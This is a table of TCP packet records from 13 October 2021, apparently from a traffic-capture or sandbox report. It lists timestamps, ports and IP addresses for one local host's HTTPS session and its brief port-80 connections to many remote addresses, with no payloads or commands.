Oct 13, 2021 15:47:09.576198101 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.576234102 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.576448917 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.576811075 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.576973915 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577033997 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.577064991 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577161074 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.577275038 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.577302933 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577502966 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.577647924 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577779055 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577857971 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.577898026 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.577965975 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.578053951 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.578285933 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.578418970 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.578443050 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.578464985 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.578660965 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.578675032 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.578708887 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.578838110 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.578849077 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.579199076 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.579343081 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.579386950 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.579410076 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.579505920 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.579612017 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.579628944 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.579844952 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.580110073 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.580245018 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.580266953 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.580291033 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.580389023 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.580502987 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.580521107 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.580682039 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.580944061 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.581080914 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.581091881 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.581115007 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.581234932 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.581255913 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.581270933 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.581410885 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.581825018 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.581970930 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.581998110 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.582145929 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.582195044 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.582230091 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.582336903 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.582391977 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.582882881 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583036900 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.583070993 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583182096 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583323956 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.583374023 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583384991 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.583559036 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.583782911 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583946943 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.583997965 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584023952 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584112883 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584178925 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584202051 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584218979 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584330082 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584356070 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584498882 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584515095 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584530115 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.584656000 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584765911 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.584813118 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.585016012 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.585349083 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.585510969 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.585547924 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.585567951 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.585679054 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.585748911 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.585776091 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.585805893 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.586061001 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.586287022 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.586436987 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.586466074 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.586575985 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.586613894 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.586637020 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.586843014 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.586890936 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587038994 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.587166071 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587307930 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.587333918 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587450027 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587536097 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587570906 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.587591887 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587639093 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.587788105 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.587833881 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.587982893 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588094950 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588243961 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588269949 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588397980 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588432074 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588453054 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588541031 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588622093 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588648081 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588666916 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588814974 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588829041 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588846922 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.588973045 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.588996887 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589143038 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589162111 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589175940 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589320898 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589340925 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589359999 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589448929 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589535952 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589556932 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589575052 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589728117 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589750051 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589765072 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.589880943 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.589988947 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590014935 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590112925 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590168953 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590190887 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590276957 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590377092 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590388060 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590413094 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590428114 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590622902 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590663910 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590714931 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.590811968 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590869904 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.590902090 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:18.841167927 CEST	49774	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:47:19.024133921 CEST	80	49764	93.184.220.29	192.168.11.20
Oct 13, 2021 15:47:19.024317980 CEST	49764	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:47:19.039993048 CEST	80	49775	93.184.220.29	192.168.11.20
Oct 13, 2021 15:47:19.040226936 CEST	49775	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:48:07.859484911 CEST	49764	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:48:07.870238066 CEST	80	49764	93.184.220.29	192.168.11.20
Oct 13, 2021 15:48:07.870469093 CEST	49764	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:48:08.812424898 CEST	49775	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:48:08.823291063 CEST	80	49775	93.184.220.29	192.168.11.20
Oct 13, 2021 15:48:08.823519945 CEST	49775	80	192.168.11.20	93.184.220.29
Oct 13, 2021 15:48:15.789612055 CEST	49793	80	192.168.11.20	51.77.52.109
Oct 13, 2021 15:48:15.815233946 CEST	80	49793	51.77.52.109	192.168.11.20
Oct 13, 2021 15:48:15.815398932 CEST	49793	80	192.168.11.20	51.77.52.109
Oct 13, 2021 15:48:15.815474987 CEST	49793	80	192.168.11.20	51.77.52.109
Oct 13, 2021 15:48:15.841006041 CEST	80	49793	51.77.52.109	192.168.11.20
Oct 13, 2021 15:48:15.841248035 CEST	80	49793	51.77.52.109	192.168.11.20
Oct 13, 2021 15:48:15.841280937 CEST	80	49793	51.77.52.109	192.168.11.20
Oct 13, 2021 15:48:15.841687918 CEST	49793	80	192.168.11.20	51.77.52.109
Oct 13, 2021 15:48:15.841736078 CEST	49793	80	192.168.11.20	51.77.52.109
Oct 13, 2021 15:48:15.867189884 CEST	80	49793	51.77.52.109	192.168.11.20
Oct 13, 2021 15:48:21.484268904 CEST	49794	80	192.168.11.20	103.164.172.49
Oct 13, 2021 15:48:21.655992031 CEST	80	49794	103.164.172.49	192.168.11.20
Oct 13, 2021 15:48:21.656173944 CEST	49794	80	192.168.11.20	103.164.172.49
Oct 13, 2021 15:48:21.656261921 CEST	49794	80	192.168.11.20	103.164.172.49
Oct 13, 2021 15:48:21.827809095 CEST	80	49794	103.164.172.49	192.168.11.20
Oct 13, 2021 15:48:21.828289986 CEST	80	49794	103.164.172.49	192.168.11.20
Oct 13, 2021 15:48:21.828339100 CEST	80	49794	103.164.172.49	192.168.11.20
Oct 13, 2021 15:48:21.828587055 CEST	49794	80	192.168.11.20	103.164.172.49
Oct 13, 2021 15:48:21.828636885 CEST	49794	80	192.168.11.20	103.164.172.49
Oct 13, 2021 15:48:22.000293970 CEST	80	49794	103.164.172.49	192.168.11.20
Oct 13, 2021 15:48:26.941375017 CEST	49795	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:48:26.950201988 CEST	80	49795	172.67.139.41	192.168.11.20
Oct 13, 2021 15:48:26.950473070 CEST	49795	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:48:26.950541973 CEST	49795	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:48:26.959430933 CEST	80	49795	172.67.139.41	192.168.11.20
Oct 13, 2021 15:48:26.968235970 CEST	80	49795	172.67.139.41	192.168.11.20
Oct 13, 2021 15:48:26.968287945 CEST	80	49795	172.67.139.41	192.168.11.20
Oct 13, 2021 15:48:26.968679905 CEST	49795	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:48:26.968740940 CEST	49795	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:48:26.977509022 CEST	80	49795	172.67.139.41	192.168.11.20
Oct 13, 2021 15:48:32.006532907 CEST	49796	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:48:32.016824961 CEST	80	49796	34.102.136.180	192.168.11.20
Oct 13, 2021 15:48:32.017033100 CEST	49796	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:48:32.017185926 CEST	49796	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:48:32.027477980 CEST	80	49796	34.102.136.180	192.168.11.20
Oct 13, 2021 15:48:32.123902082 CEST	80	49796	34.102.136.180	192.168.11.20
Oct 13, 2021 15:48:32.123958111 CEST	80	49796	34.102.136.180	192.168.11.20
Oct 13, 2021 15:48:32.124248981 CEST	49796	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:48:32.124304056 CEST	49796	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:48:32.135066986 CEST	80	49796	34.102.136.180	192.168.11.20
Oct 13, 2021 15:48:37.671025991 CEST	49797	80	192.168.11.20	154.195.206.5
Oct 13, 2021 15:48:37.944015026 CEST	80	49797	154.195.206.5	192.168.11.20
Oct 13, 2021 15:48:37.944349051 CEST	49797	80	192.168.11.20	154.195.206.5
Oct 13, 2021 15:48:37.944444895 CEST	49797	80	192.168.11.20	154.195.206.5
Oct 13, 2021 15:48:38.217648983 CEST	80	49797	154.195.206.5	192.168.11.20
Oct 13, 2021 15:48:38.217724085 CEST	80	49797	154.195.206.5	192.168.11.20
Oct 13, 2021 15:48:38.217772961 CEST	80	49797	154.195.206.5	192.168.11.20
Oct 13, 2021 15:48:38.218210936 CEST	49797	80	192.168.11.20	154.195.206.5
Oct 13, 2021 15:48:38.218312979 CEST	49797	80	192.168.11.20	154.195.206.5
Oct 13, 2021 15:48:38.491169930 CEST	80	49797	154.195.206.5	192.168.11.20
Oct 13, 2021 15:48:43.983690977 CEST	49798	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:48:44.118522882 CEST	80	49798	198.59.144.16	192.168.11.20
Oct 13, 2021 15:48:44.118683100 CEST	49798	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:48:44.118815899 CEST	49798	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:48:44.253746986 CEST	80	49798	198.59.144.16	192.168.11.20
Oct 13, 2021 15:48:44.254714966 CEST	80	49798	198.59.144.16	192.168.11.20
Oct 13, 2021 15:48:44.254765987 CEST	80	49798	198.59.144.16	192.168.11.20
Oct 13, 2021 15:48:44.255129099 CEST	49798	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:48:44.255186081 CEST	49798	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:48:44.389822006 CEST	80	49798	198.59.144.16	192.168.11.20
Oct 13, 2021 15:48:49.578367949 CEST	49799	80	192.168.11.20	185.73.226.109
Oct 13, 2021 15:48:49.675132990 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:49.675471067 CEST	49799	80	192.168.11.20	185.73.226.109
Oct 13, 2021 15:48:49.675554037 CEST	49799	80	192.168.11.20	185.73.226.109
Oct 13, 2021 15:48:49.772103071 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:49.772166967 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:49.861639023 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:49.861692905 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:49.862766981 CEST	49799	80	192.168.11.20	185.73.226.109
Oct 13, 2021 15:48:49.862818003 CEST	49799	80	192.168.11.20	185.73.226.109
Oct 13, 2021 15:48:49.958906889 CEST	80	49799	185.73.226.109	192.168.11.20
Oct 13, 2021 15:48:55.397166967 CEST	49800	80	192.168.11.20	151.101.192.119
Oct 13, 2021 15:48:55.404449940 CEST	80	49800	151.101.192.119	192.168.11.20
Oct 13, 2021 15:48:55.404614925 CEST	49800	80	192.168.11.20	151.101.192.119
Oct 13, 2021 15:48:55.404741049 CEST	49800	80	192.168.11.20	151.101.192.119
Oct 13, 2021 15:48:55.411873102 CEST	80	49800	151.101.192.119	192.168.11.20
Oct 13, 2021 15:48:55.515916109 CEST	80	49800	151.101.192.119	192.168.11.20
Oct 13, 2021 15:48:55.515983105 CEST	80	49800	151.101.192.119	192.168.11.20
Oct 13, 2021 15:48:55.516450882 CEST	49800	80	192.168.11.20	151.101.192.119
Oct 13, 2021 15:48:55.516551018 CEST	49800	80	192.168.11.20	151.101.192.119
Oct 13, 2021 15:48:55.523938894 CEST	80	49800	151.101.192.119	192.168.11.20
Oct 13, 2021 15:49:00.629676104 CEST	49801	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:49:00.787250042 CEST	80	49801	198.54.117.210	192.168.11.20
Oct 13, 2021 15:49:00.787594080 CEST	49801	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:49:00.787650108 CEST	49801	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:49:00.945302010 CEST	80	49801	198.54.117.210	192.168.11.20
Oct 13, 2021 15:49:00.945363045 CEST	80	49801	198.54.117.210	192.168.11.20
Oct 13, 2021 15:49:06.246189117 CEST	49802	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:49:06.410842896 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.411185026 CEST	49802	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:49:06.411268950 CEST	49802	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:49:06.582165956 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.582230091 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.582276106 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.582320929 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.582356930 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:06.582748890 CEST	49802	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:49:06.582798958 CEST	49802	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:49:06.747168064 CEST	80	49802	204.141.43.204	192.168.11.20
Oct 13, 2021 15:49:11.613231897 CEST	49803	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:49:11.623892069 CEST	80	49803	34.102.136.180	192.168.11.20
Oct 13, 2021 15:49:11.624159098 CEST	49803	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:49:11.624213934 CEST	49803	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:49:11.634898901 CEST	80	49803	34.102.136.180	192.168.11.20
Oct 13, 2021 15:49:11.731408119 CEST	80	49803	34.102.136.180	192.168.11.20
Oct 13, 2021 15:49:11.731463909 CEST	80	49803	34.102.136.180	192.168.11.20
Oct 13, 2021 15:49:11.731822968 CEST	49803	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:49:11.731908083 CEST	49803	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:49:11.742897987 CEST	80	49803	34.102.136.180	192.168.11.20
Oct 13, 2021 15:49:16.921832085 CEST	49804	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:49:17.017003059 CEST	80	49804	66.96.130.148	192.168.11.20
Oct 13, 2021 15:49:17.017203093 CEST	49804	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:49:17.017303944 CEST	49804	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:49:17.111994028 CEST	80	49804	66.96.130.148	192.168.11.20
Oct 13, 2021 15:49:17.150295973 CEST	80	49804	66.96.130.148	192.168.11.20
Oct 13, 2021 15:49:17.150346041 CEST	80	49804	66.96.130.148	192.168.11.20
Oct 13, 2021 15:49:17.150722980 CEST	49804	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:49:17.150772095 CEST	49804	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:49:17.245755911 CEST	80	49804	66.96.130.148	192.168.11.20
Oct 13, 2021 15:49:27.866367102 CEST	49805	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:49:28.012020111 CEST	80	49805	216.189.108.75	192.168.11.20
Oct 13, 2021 15:49:28.012217999 CEST	49805	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:49:28.012269974 CEST	49805	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:49:28.159526110 CEST	80	49805	216.189.108.75	192.168.11.20
Oct 13, 2021 15:49:28.159544945 CEST	80	49805	216.189.108.75	192.168.11.20
Oct 13, 2021 15:49:28.159826994 CEST	49805	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:49:28.159846067 CEST	49805	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:49:28.306107998 CEST	80	49805	216.189.108.75	192.168.11.20
Oct 13, 2021 15:49:33.561229944 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:33.721026897 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.721282959 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:33.721334934 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:33.881352901 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.913050890 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.913132906 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.913171053 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.913206100 CEST	80	49806	199.34.228.191	192.168.11.20
Oct 13, 2021 15:49:33.913454056 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:33.913502932 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:33.913515091 CEST	49806	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:49:51.469286919 CEST	49807	80	192.168.11.20	15.197.150.5
Oct 13, 2021 15:49:51.479816914 CEST	80	49807	15.197.150.5	192.168.11.20
Oct 13, 2021 15:49:51.480014086 CEST	49807	80	192.168.11.20	15.197.150.5
Oct 13, 2021 15:49:51.480106115 CEST	49807	80	192.168.11.20	15.197.150.5
Oct 13, 2021 15:49:51.490638018 CEST	80	49807	15.197.150.5	192.168.11.20
Oct 13, 2021 15:49:51.659526110 CEST	80	49807	15.197.150.5	192.168.11.20
Oct 13, 2021 15:49:51.659599066 CEST	80	49807	15.197.150.5	192.168.11.20
Oct 13, 2021 15:49:51.659996033 CEST	49807	80	192.168.11.20	15.197.150.5
Oct 13, 2021 15:49:51.660101891 CEST	49807	80	192.168.11.20	15.197.150.5
Oct 13, 2021 15:49:51.670912981 CEST	80	49807	15.197.150.5	192.168.11.20
Oct 13, 2021 15:49:56.698201895 CEST	49808	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:49:56.865204096 CEST	80	49808	198.54.117.211	192.168.11.20
Oct 13, 2021 15:49:56.865472078 CEST	49808	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:49:56.865541935 CEST	49808	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:49:57.032469034 CEST	80	49808	198.54.117.211	192.168.11.20
Oct 13, 2021 15:49:57.032516956 CEST	80	49808	198.54.117.211	192.168.11.20
Oct 13, 2021 15:50:02.073946953 CEST	49809	80	192.168.11.20	142.250.186.179
Oct 13, 2021 15:50:02.084337950 CEST	80	49809	142.250.186.179	192.168.11.20
Oct 13, 2021 15:50:02.084599018 CEST	49809	80	192.168.11.20	142.250.186.179
Oct 13, 2021 15:50:02.084647894 CEST	49809	80	192.168.11.20	142.250.186.179
Oct 13, 2021 15:50:02.095087051 CEST	80	49809	142.250.186.179	192.168.11.20
Oct 13, 2021 15:50:02.194884062 CEST	80	49809	142.250.186.179	192.168.11.20
Oct 13, 2021 15:50:02.195254087 CEST	49809	80	192.168.11.20	142.250.186.179
Oct 13, 2021 15:50:02.196185112 CEST	80	49809	142.250.186.179	192.168.11.20
Oct 13, 2021 15:50:02.196695089 CEST	49809	80	192.168.11.20	142.250.186.179
